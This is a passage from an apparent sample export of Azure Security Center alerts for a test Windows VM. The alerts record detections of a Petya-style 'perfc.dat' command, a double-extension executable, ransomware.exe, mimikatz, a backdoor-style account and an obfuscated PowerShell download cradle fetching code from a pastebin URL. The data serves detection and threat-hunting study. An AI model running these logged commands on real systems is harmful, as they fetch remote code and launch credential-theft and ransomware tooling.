""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1888"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=9E83f2V9Ix17hs7kF%2B%2FwVNoEivLC4GV%2FfNgRULmjp4U%3D&spr=https&st=2019-01-15T13:00:23Z&se=2019-04-15T13:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1888"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""EndTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
184,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:17,2019-01-15 17:15:17,e6c85135-2b91-4537-b9a0-dae7eabb8e9d,2518547282825853773_e6c85135-2b91-4537-b9a0-dae7eabb8e9d,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x104c"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=LJjocPW4cXTziFrh16nRdnR8T6OiQlSXU%2BCqo8xqjyo%3D&spr=https&st=2019-01-15T11:50:23Z&se=2019-04-15T12:05:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x104c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""EndTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
185,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:19,2019-01-15 17:15:19,4a524cc8-7613-4c42-93a9-8c1e466a4476,2518547282802847718_4a524cc8-7613-4c42-93a9-8c1e466a4476,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=xLQr4wf0XrlsMA2ntQVr9F0JYKmrWrDYb054eLfeKhk%3D&spr=https&st=2019-01-15T12:16:41Z&se=2019-04-15T12:31:41Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""EndTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
186,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,0c3ae402-a9ea-4d5c-9c09-4274b7847c2c,2518547282859754476_0c3ae402-a9ea-4d5c-9c09-4274b7847c2c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15f4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15f4"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
187,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:12,2019-01-15 17:15:12,d89d1ab7-e5b7-426c-a98f-eab95deea3ad,2518547282878855119_d89d1ab7-e5b7-426c-a98f-eab95deea3ad,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1134"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1134"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""EndTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
188,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:03,2019-01-15 05:15:03,90beedae-1285-43d6-8f33-16bc542af39b,2518547714966107270_90beedae-1285-43d6-8f33-16bc542af39b,Detection,Microsoft,Anomalous account creation detected,Anomalous account creation detected,Anomalous account creation detected,"Analysis of host data indicates suspicious account creation in your environment.
This activity could either be legitimate, or an indication that the host has been compromised and a backdoor account was installed on it for persistence purposes.",Medium,False,"{
""Machine Name"": ""MSTICALERTSWIN1"",
""Created Account"": ""adm1nistrator"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 22:46:37,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,